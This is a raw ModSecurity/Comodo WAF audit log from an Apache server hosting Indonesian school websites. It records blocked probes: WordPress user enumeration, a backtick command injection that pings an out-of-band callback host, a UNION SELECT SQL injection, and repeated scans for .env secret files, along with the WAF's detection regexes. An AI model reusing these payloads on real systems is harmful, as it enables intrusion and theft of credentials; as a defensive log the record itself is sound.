p1=520, p2=1586, p3=0, p4=0, p5=42, sr=91, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5ea8e028-Z-- --eae8150a-A-- [21/May/2025:10:34:54 +0700] aC1J3ov3pT1iV0OxjLTnnQAAAJM 103.236.140.4 41066 103.236.140.4 8181 --eae8150a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 110.235.250.160 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 110.235.250.160 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --eae8150a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --eae8150a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747798494701517 3304 (- - -) Stopwatch2: 1747798494701517 3304; combined=1427, p1=517, p2=879, p3=0, p4=0, p5=30, sr=147, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eae8150a-Z-- --bb814d2f-A-- [21/May/2025:10:38:05 +0700] aC1KnYv3pT1iV0OxjLTnogAAAIY 103.236.140.4 41090 103.236.140.4 8181 --bb814d2f-B-- GET /card_scan.php?No=30&ReaderNo=%60ping%20d0mbkqa4kqtm561jt3n0mxrugr85gnoga.oast.fun%60 HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Cookie: X-Forwarded-For: 154.26.179.43 Accept-Encoding: gzip X-Varnish: 164788331 --bb814d2f-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --bb814d2f-E-- --bb814d2f-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?:\\b(?:c(?:d(?:\\b[^a-zA-Z0-9_]{0,}?[\\/]|[^a-zA-Z0-9_]{0,}?\\.\\.)|hmod.{0,40}?\\+.{0,3}x|md(?:\\b[^a-zA-Z0-9_]{0,}?\\/c|(?:\\.exe|32)\\b))|(?:echo\\b[^a-zA-Z0-9_]{0,}?\\by{1,}|n(?:et(?:\\b[^a-zA-Z0-9_]{1,}?\\blocalgroup|\\.exe)|(?:c|map)\\.exe)|t(? ..." at MATCHED_VAR. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "65"] [id "211210"] [rev "8"] [msg "COMODO WAF: System Command Injection||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: `ping found within ARGS:ReaderNo: `ping d0mbkqa4kqtm561jt3n0mxrugr85gnoga.oast.fun`"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost Stopwatch: 1747798685557691 2446 (- - -) Stopwatch2: 1747798685557691 2446; combined=681, p1=486, p2=163, p3=0, p4=0, p5=32, sr=75, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bb814d2f-Z-- --34f4bf75-A-- [21/May/2025:10:38:05 +0700] aC1KnYv3pT1iV0OxjLTnowAAAIU 103.236.140.4 41090 103.236.140.4 8181 --34f4bf75-B-- POST /cgi-bin/supportInstaller HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 83 User-Agent: MSIE Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 154.26.179.43, 103.236.140.4 Cookie: X-Varnish: 167545424 --34f4bf75-C-- fromEmailInvite=1&customerTID=unpossible'+UNION+SELECT+0,0,0,11132*379123,0,0,0,0-- --34f4bf75-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --34f4bf75-E-- --34f4bf75-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\x22'`](?:;? ?\\b(?:having|select|union)\\b ?[^\\s]| ?! 
?[\\x22'`\\w])|\\b(?:c(?:onnection_id|urrent_user)|database)\\b ?\\(|\\bunion\\b[\\w(\\s]*?select\\b|\\buser ?\\(|\\bschema ?\\(|\\bselect.{0,399}?\\w?\\buser ?\\(|\\binto[\\s+]+(?:dump|o ..." at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "27"] [id "211650"] [rev "12"] [msg "COMODO WAF: Detects MSSQL code execution and information gathering attempts||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: unpossible' UNION SELECT 0,0,0,11132*379123,0,0,0,0 found within MATCHED_VAR: unpossible' UNION SELECT 0,0,0,11132*379123,0,0,0,0"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: cgi-script Stopwatch: 1747798685588379 3465 (- - -) Stopwatch2: 1747798685588379 3465; combined=1912, p1=422, p2=1460, p3=0, p4=0, p5=29, sr=75, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --34f4bf75-Z-- --5e9dfe0d-A-- [21/May/2025:10:48:58 +0700] aC1NKiioYDAgD0WHUjSnXAAAAFI 103.236.140.4 41232 103.236.140.4 8181 --5e9dfe0d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 123.24.142.238 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 123.24.142.238 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --5e9dfe0d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5e9dfe0d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747799338600878 3155 (- - -) Stopwatch2: 1747799338600878 3155; combined=1326, p1=468, p2=828, p3=0, p4=0, p5=30, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5e9dfe0d-Z-- --af59a963-A-- [21/May/2025:10:49:47 +0700] aC1NWyioYDAgD0WHUjSnYAAAAEA 103.236.140.4 41244 103.236.140.4 8181 --af59a963-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.117.209 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.117.209 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_5; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.15 Safari/534.13 Accept-Charset: utf-8 --af59a963-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --af59a963-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747799387048613 832 (- - -) Stopwatch2: 1747799387048613 832; combined=334, p1=291, p2=0, p3=0, p4=0, p5=43, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --af59a963-Z-- --8f11f942-A-- [21/May/2025:10:59:56 +0700] aC1PvHZGSt58M5vv3glyngAAABI 103.236.140.4 41300 103.236.140.4 8181 --8f11f942-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 197.245.236.2 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 197.245.236.2 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --8f11f942-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8f11f942-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747799996293465 3181 (- - -) Stopwatch2: 1747799996293465 3181; combined=1299, p1=446, p2=823, p3=0, p4=0, p5=29, sr=81, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8f11f942-Z-- --de55c41e-A-- [21/May/2025:11:01:08 +0700] aC1QBHZGSt58M5vv3glyoAAAABQ 103.236.140.4 41312 103.236.140.4 8181 --de55c41e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.117.209 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.117.209 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/604.1 (KHTML, like Gecko) Version/11.0 Safari/604.1 Ubuntu/17.04 (3.24.1-0ubuntu1) Epiphany/3.24.1 Accept-Charset: utf-8 --de55c41e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --de55c41e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747800068162671 691 (- - -) Stopwatch2: 1747800068162671 691; combined=306, p1=279, p2=0, p3=0, p4=0, p5=27, sr=116, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --de55c41e-Z-- --eacc742b-A-- [21/May/2025:11:03:17 +0700] aC1QhYv3pT1iV0OxjLTnygAAAJc 103.236.140.4 41320 103.236.140.4 8181 --eacc742b-B-- GET /.env.bak HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 144.172.91.236 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 144.172.91.236 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Accept: */* Accept-Language: en --eacc742b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --eacc742b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747800197363993 864 (- - -) Stopwatch2: 1747800197363993 864; combined=373, p1=337, p2=0, p3=0, p4=0, p5=36, sr=111, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eacc742b-Z-- --7609b215-A-- [21/May/2025:11:03:17 +0700] aC1QhYv3pT1iV0OxjLTnywAAAIM 103.236.140.4 41324 103.236.140.4 8181 --7609b215-B-- GET /.env.live HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 144.172.91.236 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 144.172.91.236 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Accept: */* Accept-Language: en --7609b215-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7609b215-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747800197557313 807 (- - -) Stopwatch2: 1747800197557313 807; combined=342, p1=314, p2=0, p3=0, p4=0, p5=28, sr=130, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7609b215-Z-- --60f8495f-A-- [21/May/2025:11:03:17 +0700] aC1QhYv3pT1iV0OxjLTnzAAAAIE 103.236.140.4 41334 103.236.140.4 8181 --60f8495f-B-- GET /.env_1 HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 144.172.91.236 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 144.172.91.236 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Accept: */* Accept-Language: en --60f8495f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --60f8495f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747800197557509 755 (- - -) Stopwatch2: 1747800197557509 755; combined=289, p1=262, p2=0, p3=0, p4=0, p5=26, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --60f8495f-Z-- --de7ad441-A-- [21/May/2025:11:03:17 +0700] aC1QhXZGSt58M5vv3glyogAAABc 103.236.140.4 41330 103.236.140.4 8181 --de7ad441-B-- GET /.env.prod HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 144.172.91.236 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 144.172.91.236 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Accept: */* Accept-Language: en --de7ad441-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --de7ad441-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747800197557547 836 (- - -) Stopwatch2: 1747800197557547 836; combined=357, p1=318, p2=0, p3=0, p4=0, p5=38, sr=116, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --de7ad441-Z-- --ee0aec37-A-- [21/May/2025:11:03:17 +0700] aC1QhRpv_mIXt2pDBOoHMwAAANQ 103.236.140.4 41322 103.236.140.4 8181 --ee0aec37-B-- GET /.env.production HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 144.172.91.236 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 144.172.91.236 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Accept: */* Accept-Language: en --ee0aec37-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ee0aec37-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747800197557528 1031 (- - -) Stopwatch2: 1747800197557528 1031; combined=363, p1=326, p2=0, p3=0, p4=0, p5=36, sr=100, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ee0aec37-Z-- --bec82e6d-A-- [21/May/2025:11:03:17 +0700] aC1QhXZGSt58M5vv3glyowAAAAA 103.236.140.4 41342 103.236.140.4 8181 --bec82e6d-B-- GET /.env.dev HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 144.172.91.236 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 144.172.91.236 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Accept: */* Accept-Language: en --bec82e6d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bec82e6d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747800197557812 849 (- - -) Stopwatch2: 1747800197557812 849; combined=310, p1=279, p2=0, p3=0, p4=0, p5=31, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bec82e6d-Z-- --09657f57-A-- [21/May/2025:11:03:17 +0700] aC1QhSioYDAgD0WHUjSnawAAAE0 103.236.140.4 41340 103.236.140.4 8181 --09657f57-B-- GET /.env.103.236 HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 144.172.91.236 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 144.172.91.236 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Accept: */* Accept-Language: en --09657f57-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --09657f57-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747800197557853 917 (- - -) Stopwatch2: 1747800197557853 917; combined=348, p1=307, p2=0, p3=0, p4=0, p5=41, sr=128, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --09657f57-Z-- --e279065f-A-- [21/May/2025:11:03:17 +0700] aC1QhRpv_mIXt2pDBOoHNAAAANU 103.236.140.4 41348 103.236.140.4 8181 --e279065f-B-- GET /.env.stage HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 144.172.91.236 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 144.172.91.236 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Accept: */* Accept-Language: en --e279065f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e279065f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747800197557826 1061 (- - -) Stopwatch2: 1747800197557826 1061; combined=304, p1=264, p2=0, p3=0, p4=0, p5=40, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e279065f-Z-- --1f86f702-A-- [21/May/2025:11:03:17 +0700] aC1QhXZGSt58M5vv3glypQAAABg 103.236.140.4 41336 103.236.140.4 8181 --1f86f702-B-- GET /.env_sample HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 144.172.91.236 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 144.172.91.236 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Accept: */* Accept-Language: en --1f86f702-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1f86f702-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747800197557843 1189 (- - -) Stopwatch2: 1747800197557843 1189; combined=214, p1=193, p2=0, p3=0, p4=0, p5=21, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1f86f702-Z-- --8d048037-A-- [21/May/2025:11:03:17 +0700] aC1QhYv3pT1iV0OxjLTnzQAAAJg 103.236.140.4 41332 103.236.140.4 8181 --8d048037-B-- GET /.env.prod.local HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 144.172.91.236 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 144.172.91.236 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Accept: */* Accept-Language: en --8d048037-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8d048037-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747800197557508 1661 (- - -) Stopwatch2: 1747800197557508 1661; combined=296, p1=267, p2=0, p3=0, p4=0, p5=29, sr=92, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
